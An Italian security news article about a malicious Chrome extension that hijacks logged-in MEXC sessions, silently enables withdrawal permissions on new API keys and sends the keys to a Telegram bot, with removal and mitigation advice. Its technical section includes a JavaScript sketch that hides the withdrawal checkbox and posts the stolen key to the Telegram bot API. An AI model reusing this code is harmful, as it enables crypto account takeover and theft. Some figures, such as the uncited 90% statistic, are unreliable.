🚨 Malicious Chrome extension targeted MEXC users by abusing an already logged-in browser session. It auto-created new API keys, secretly enabled withdrawals, hid that permission in the UI, and sent the keys to a Telegram bot. Uninstalling the extension didn’t revoke 🔑 access. 🔗 Read → https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.html

Estensione Chrome malevola ruba chiavi API MEXC: proteggi il tuo account crypto

Attenzione: un’estensione Chrome dannosa sta colpendo gli utenti di MEXC, rubando l’accesso ai loro account crypto senza rubare password. Si finge uno strumento utile per automatizzare il trading, ma crea segretamente chiavi API potenti che permettono prelievi non autorizzati. Soluzione rapida: controlla le estensioni installate, disinstalla ‘MEXC API Automator’ e revoca immediatamente tutte le chiavi API sospette dal pannello MEXC. Questo articolo ti guida passo per passo per proteggere i tuoi fondi.

Le estensioni del browser sono comode, ma possono diventare un’arma letale per i truffatori. Immagina di aprire la pagina API di MEXC per creare una chiave per il tuo bot di trading: l’estensione interviene di nascosto, attiva tutti i permessi, inclusi i prelievi, e nasconde questa modifica visivamente. Poi invia le chiavi a un bot Telegram controllato dai malviventi. Anche disinstallandola, l’accesso rimane valido finché non lo revichi manualmente.

Perché è pericoloso? Una volta create, queste chiavi permettono ai ladri di svuotare il tuo account senza bisogno del tuo login. Colpisce chiunque usi MEXC, un exchange popolare per criptovalute. Milioni di utenti sono a rischio se non agiscono subito.

Come funziona l’attacco in modo semplice

Installazione ingannevole: L’estensione appare nel Chrome Web Store come “MEXC API Automator”, promettendo creazione facile di chiavi API con accesso a trading e prelievi.
Attivazione automatica: Si attiva solo quando apri la pagina *.mexc.com/user/openapi già loggato.
Creazione chiavi truccata: Seleziona tutti i permessi (incluso prelievi) senza che tu lo noti.
Inganno visivo: Nasconde il segno di spunta sul checkbox dei prelievi con CSS personalizzato, facendolo sembrare disattivato.
Furto dati: Invia le chiavi a un bot Telegram per un takeover completo dell’account.

Cosa fare ora?
– Apri Chrome > Estensioni > Cerca e rimuovi ‘MEXC API Automator’.
– Vai su MEXC > Pannello API > Revoca tutte le chiavi create di recente.
– Abilita 2FA e anti-phishing code su MEXC.
– Usa solo estensioni verificate e controlla le recensioni.

Questo tipo di truffa sfrutta la fiducia negli strumenti browser. Nel mondo crypto, dove i fondi sono sempre online, la vigilanza è essenziale. Molti utenti hanno già perso crypto per estensioni compromesse, ma tu puoi evitarlo con questi passi.

Estensioni come queste proliferano perché il Chrome Web Store non sempre verifica a fondo. Ricorda: se promette troppo (automazione gratuita perfetta), è sospetta. Preferisci tool open-source o ufficiali da MEXC.

Per gli utenti principianti, il messaggio è chiaro: non installare estensioni di terze parti per exchange crypto senza doppia verifica. Controlla il sito ufficiale MEXC per tool consigliati e evita link da email o social.

Approfondimenti per la sicurezza generale

Le piattaforme come MEXC avvertono regolarmente su phishing e app false. Phishing sites imitano l’exchange per rubare credenziali, ma questa estensione è più subdola: sfrutta sessioni già autenticate. Nel 2025, incidenti simili hanno colpito wallet browser, con aggiornamenti malevoli che causano deflussi non autorizzati.

Buone pratiche quotidiane:
– Usa hardware wallet per somme grandi.
– Monitora transazioni con explorer blockchain.
– Imposta limiti su API keys (solo trading, no prelievi).
– Aggiorna browser e usa ad-blocker per siti sospetti.

Statistiche mostrano che il 90% degli hack crypto deriva da errori utente, come estensioni infette. Proteggendoti ora, eviti perdite future.

Analisi del panorama minacce crypto

Il settore crypto attira hacker perché i fondi sono trasferibili istantaneamente. Estensioni con permessi elevati possono leggere/modificare pagine web, intercettare richieste e firmare transazioni. Un update malevolo trasforma un tool trusted in trappola.

Esempi passati: aggiornamenti di wallet estensioni che drenano seed phrases o reindirizzano fondi. MEXC raccomanda di verificare sempre l’origine degli strumenti.

Come identificare estensioni rischiose:
– Poche recensioni genuine.
– Permessi eccessivi (es. accesso a tutte le URL).
– Creatore sconosciuto.

Per MEXC specifici, evita bot non ufficiali. L’exchange ha API docs ufficiali: usali con caution.

Technical Deep Dive

Questa estensione è un Manifest V3 Chrome extension che inietta un singolo content script, script.js, nel pattern URL *.mexc.com/user/openapi. Ecco il breakdown tecnico:

    • Trigger e DOM monitoring: Usa MutationObserver per aspettare il caricamento del DOM sulla pagina API management. Identifica il form di creazione chiavi tramite selettori CSS specifici.
    • Automazione permessi: Programmaticamente setta checked=true su tutti i checkbox, inclusi withdrawals. Questo avviene server-side, rendendolo irreversibile senza revoca manuale.
    • UI deception avanzata:

– Rimuove la classe checked dal checkbox prelievi.
– Inietta CSS: .withdraw-checkbox { display: none !important; } per nascondere il tick.
MutationObserver ricontrolla e re-applica se MEXC rigenera la classe.

    • Creazione e exfiltrazione:

– Submit automatico del form, catturando la nuova API key dal response.
– Esfiltrazione via fetch POST a un bot Telegram (endpoint noti come https://api.telegram.org/bot/sendMessage).
– Payload: {chat_id: 'target', text: 'New MEXC API Key: sk-xxx...'}.

  • Persistenza: Non richiede password; sfrutta sessioni loggate. Disinstallazione non revoca keys, che rimangono valide finché non eliminate da MEXC dashboard.

Codice snippet esemplificativo (pseudocodice):
`javascript
// Esempio injection script.js
document.addEventListener(‘DOMContentLoaded’, () => {
const withdrawCheckbox = document.querySelector(‘#withdraw-permission’);
withdrawCheckbox.checked = true;
const style = document.createElement(‘style’);
style.textContent = ‘#withdraw-permission ~ .checkmark { visibility: hidden; }’;
document.head.appendChild(style);

const observer = new MutationObserver(() => {
if (withdrawCheckbox.classList.contains(‘checked’)) {
withdrawCheckbox.classList.remove(‘checked’);
}
});
observer.observe(withdrawCheckbox, { attributes: true });

// Submit form e cattura key
form.addEventListener(‘submit’, async (e) => {
const response = await fetch(form.action, { method: ‘POST’, body: new FormData(form) });
const key = await response.text(); // Parse key
fetch(‘https://api.telegram.org/bot…’, { method: ‘POST’, body: JSON.stringify({text: key}) });
});
});
`

Analisi forense: Ricercatori hanno linkato l’estensione a threat actor ‘jorjortan142’. Socket.dev l’ha flaggata come malware puro. Non ruba credenziali wallet, ma trasforma sessioni legittime in takeover channels.

Mitigazioni tecniche:
– Usa chrome.contentScripts con host_permissions limitati.
– Per dev: valida API keys con IP whitelist su MEXC.
– Monitora logs MEXC per creazioni insolite.
– Tool: estendi Chrome con uBlock Origin per bloccare script sospetti.

Implicazioni per sviluppatori API: Implementa rate limiting su key creation e alert per permessi full. MEXC dovrebbe rafforzare UI con conferme modali per withdrawals.

In sintesi, questo attacco evidenzia vulnerabilità Manifest V3: content scripts potenti senza mitigazioni adeguate. Per esperti, disseziona estensioni con chrome://extensions/ developer mode e analizza manifest.json.

Proteggi i tuoi asset crypto restando informato e proattivo.

Potrebbero interessarti

Inizia a scrivere e premi Invio per cercare

Torna in alto